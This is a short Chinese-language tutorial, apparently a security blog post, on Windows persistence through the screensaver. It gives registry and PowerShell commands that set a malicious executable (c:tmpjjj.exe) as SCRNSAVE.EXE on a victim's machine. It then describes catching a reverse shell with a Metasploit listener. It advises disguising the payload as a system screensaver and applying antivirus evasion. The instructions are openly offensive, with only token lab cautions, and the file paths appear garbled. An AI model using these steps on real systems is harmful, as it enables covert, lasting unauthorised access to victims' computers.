利用屏幕保护程序进行权限维持

  • A+

0x00:简介

1、屏幕保护程序,当初的设计是为了防止长期屏幕的显示,预防老化与缩短屏幕显示器老化的一种保护程序。

2、攻击者可以利用屏幕保护程序来隐藏shell,达到一定的权限维持。

3、如果想长期隐藏,请作免杀处理

0x01:过程

1、屏幕保护的存放位置

Win32

图片1.png

Win64

图片2.png

2、制作恶意程序

图片3.png

然后放至受孩者的电脑上
(我这里是放到了C盘的tmp下)

3、通过CMD来植入恶意程序(注:本机测试请先备份好注册表)

利用代码:reg add "hkcucontrol paneldesktop" /v SCRNSAVE.EXE /d c:tmpjjj.exe

图片4.png

图片5.png

图片6.png

投放完毕

4、设置监听

图片7.png

执行exploit
等待一分钟

图片8.png

shell到手

5、通过powershell来植入恶意程序(注:本机测试请先备份好注册表)

利用代码:
New-ItemProperty -Path 'HKCU:Control PanelDesktop' -Name 'SCRNSAVE.EXE' -Value 'c:tmpjjj.exe'
执行前

图片9.png

执行后

图片10.png

图片11.png

投放完毕
MSF设置完监听
执行exploit
等待一分钟

图片12.png

shell到手

0x02:后话

1、就是用户在线使用电脑的情况下,是不会启动屏幕保护程序的,也就是说恶意程序会不起作用。
2、这种程序很容易就会被发现,建议可以做成跟系统相似的屏幕保护程序,便于隐藏。
3、建议做免杀处理
4、敌不动,我动。敌动,我不动

相关推荐: 复现微软Exchange Proxylogon漏洞

原文信息 原文地址:https://www.praetorian.com/blog/reproducing-proxylogon-exploit/ by Anthony Weems and Dallas Kaman and Michael Weber on M…